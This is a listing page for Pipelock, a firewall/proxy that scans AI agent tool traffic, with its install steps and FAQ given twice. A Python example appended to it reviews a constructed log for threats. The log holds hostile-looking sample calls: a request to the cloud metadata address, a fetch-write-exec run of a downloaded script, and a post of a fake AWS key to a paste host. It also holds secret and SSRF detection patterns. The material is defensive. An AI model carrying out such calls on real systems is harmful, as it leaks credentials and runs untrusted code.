# Pipelock — MCP Firewall for Agent Egress

> Run Pipelock as an agent firewall/proxy to scan MCP traffic for injection, secrets, SSRF, and risky tool chains; integrate with Claude Code fast.

## Quick Use

1. Install:

   ```bash
   brew install luckyPipewrench/tap/pipelock
   ```

2. Run:

   ```bash
   pipelock claude setup
   ```

3. Verify:
   - Trigger one tool call and confirm it is scanned/allowed or denied with a clear reason.

---

## Intro

Run Pipelock as an agent firewall/proxy to scan MCP traffic for injection, secrets, SSRF, and risky tool chains; integrate with Claude Code fast.

- **Best for:** teams running tool-using agents (MCP/HTTP) who need egress control and auditable security checks
- **Works with:** Claude Code hooks, MCP proxy patterns, and forward-proxy style agent egress control (per docs)
- **Setup time:** 10 minutes

### Quantitative Notes

- GitHub stars + forks (verified): see Source & Thanks
- Docs mention scanners for secrets + injection patterns (repo/docs)
- Setup time ~10 minutes (install + Claude Code setup + restart)

---

## Practical Notes

A pragmatic rollout: install the binary, enable Claude Code integration, and restart. Then run 10–20 normal tasks and record what gets flagged. Create allow/deny rules based on real incidents: metadata SSRF attempts, secret patterns in prompts, and risky tool chains (e.g., web fetch → write file → exec).

**Safety note:** Don’t rely on a single control. Combine firewall/proxy checks with least-privilege tools, sandboxing, and human approval for high-risk actions.

### FAQ

**Q: Is this a replacement for sandboxing?**
A: No. It complements sandboxing by enforcing egress policy and scanning tool traffic.

**Q: Will it break my workflows?**
A: Start in observe mode (or with a permissive preset) and tighten rules once you see false positives.

**Q: Where should I enforce policy?**
A: At the boundary: before tools execute or requests leave the machine/network.

---

## Source & Thanks

> GitHub: https://github.com/luckyPipewrench/pipelock
> Owner avatar: https://avatars.githubusercontent.com/u/142104046?v=4
> License (SPDX): Apache-2.0
> GitHub stars (verified via `api.github.com/repos/luckyPipewrench/pipelock`): 577
> GitHub forks (verified via `api.github.com/repos/luckyPipewrench/pipelock`): 61

---

# Pipelock: Agent Egress/MCP Firewall and Proxy

> Use Pipelock as an agent firewall/proxy: scan MCP and egress traffic for injection, secrets, SSRF, and risky chains; it supports quick integration with Claude Code and outputs auditable block reasons and evidence to aid troubleshooting.

## Quick Use

1. Install:

   ```bash
   brew install luckyPipewrench/tap/pipelock
   ```

2. Run:

   ```bash
   pipelock claude setup
   ```

3. Verify:
   - Trigger one tool call and confirm it is scanned/allowed or denied with a clear reason.

---

## Intro

Use Pipelock as an agent firewall/proxy: scan MCP and egress traffic for injection, secrets, SSRF, and risky chains; it supports quick integration with Claude Code and outputs auditable block reasons and evidence to aid troubleshooting.

- **Best for:** teams running tool-calling agents (MCP/HTTP) that need egress control and auditable security checks
- **Works with:** Claude Code hooks, MCP proxy patterns, and forward-proxy style agent egress control (per the docs)
- **Setup time:** 10 minutes

### Quantitative Notes

- GitHub stars + forks (verified): see "Source & Thanks"
- The docs mention scanning capabilities such as secrets + injection detection (repo/docs)
- Integration takes about 10 minutes (install + setup + restart)

---

## Practical Notes

Recommended rollout: first install the binary and integrate with Claude Code; after restarting, run 10–20 everyday tasks and record what gets blocked or flagged. Then write allow/deny rules based on real risks, such as cloud metadata SSRF, secret patterns in prompts, and risky tool chains (web fetch → write file → exec).

**Safety note:** Don't rely on a single control. Use the firewall/proxy together with least-privilege tools, sandboxing, and human review of high-risk actions.

### FAQ

**Q: Can it replace a sandbox?**
A: No. It is more of a reinforcement: it enforces egress policy and scans traffic at the boundary, and is more robust when paired with a sandbox.

**Q: Will it break my workflows?**
A: Start in observe mode or with a permissive preset, and tighten the rules step by step after confirming the false positives.

**Q: Where should policy live?**
A: At the boundary: before tools execute and before requests leave the machine/network.

---

## Source & Thanks

> GitHub: https://github.com/luckyPipewrench/pipelock
> Owner avatar: https://avatars.githubusercontent.com/u/142104046?v=4
> License (SPDX): Apache-2.0
> GitHub stars (verified via `api.github.com/repos/luckyPipewrench/pipelock`): 577
> GitHub forks (verified via `api.github.com/repos/luckyPipewrench/pipelock`): 61

---
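The review step from the Practical Notes (record what a batch of normal tasks would trip, then write rules from it) can be rehearsed offline. The Python below is an added example, not Pipelock's code, rule syntax or log format: the tool names, record fields, patterns and sample calls are all constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlparse
FAKE_KEY = "AKIA" + "A1B2C3D4E5F6G7H8"  # constructed, not a real credential
OBSERVED = [  # constructed observation log; tool names and fields are hypothetical
    {"task": "t1", "tool": "web_fetch", "args": {"url": "https://example.com/docs"}},
    {"task": "t2", "tool": "web_fetch", "args": {"url": "http://169.254.169.254/latest/meta-data/"}},
    {"task": "t3", "tool": "web_fetch", "args": {"url": "https://example.com/install.sh"}},
    {"task": "t3", "tool": "write_file", "args": {"path": "/tmp/install.sh"}},
    {"task": "t3", "tool": "exec", "args": {"cmd": "sh /tmp/install.sh"}},
    {"task": "t4", "tool": "http_post", "args": {"url": "https://example.net/paste", "body": "debug key=" + FAKE_KEY}},
]
METADATA_HOSTS = {"metadata.google.internal"}
LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")  # covers 169.254.169.254
SECRET_PATTERNS = {"aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b")}
RISKY_CHAIN = ("web_fetch", "write_file", "exec")

def is_metadata_target(url):
    """True if the URL's host is a cloud metadata name or a link-local IP literal."""
    host = (urlparse(url).hostname or "").lower()
    try:
        return host in METADATA_HOSTS or ipaddress.ip_address(host) in LINK_LOCAL
    except ValueError:  # a DNS name, not an IP literal
        return False

def scan_call(call):
    """Per-call findings: metadata SSRF targets and secret patterns in arguments."""
    findings = []
    for value in map(str, call["args"].values()):
        if value.startswith(("http://", "https://")) and is_metadata_target(value):
            findings.append("ssrf:metadata")
        findings += [f"secret:{n}" for n, rx in SECRET_PATTERNS.items() if rx.search(value)]
    return findings

def has_risky_chain(tools, chain=RISKY_CHAIN):
    """True if `chain` occurs in order (gaps allowed) within one task's tool calls."""
    remaining = iter(tools)
    return all(step in remaining for step in chain)

def review(calls):  # -> [(task, call_index, finding)]; chain findings use index None
    report, per_task = [], {}
    for i, call in enumerate(calls):
        report += [(call["task"], i, f) for f in scan_call(call)]
        per_task.setdefault(call["task"], []).append(call["tool"])
    report += [(t, None, "chain:" + ">".join(RISKY_CHAIN)) for t, tools in per_task.items() if has_risky_chain(tools)]
    return report

if __name__ == "__main__":
    print(*review(OBSERVED), sep="\n")
```

The benign task `t1` produces no finding, which is the false-positive baseline to check before turning any of these observations into a deny rule.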
Source: https://tokrepo.com/en/workflows/pipelock-mcp-firewall-for-agent-egress

Author: Script Depot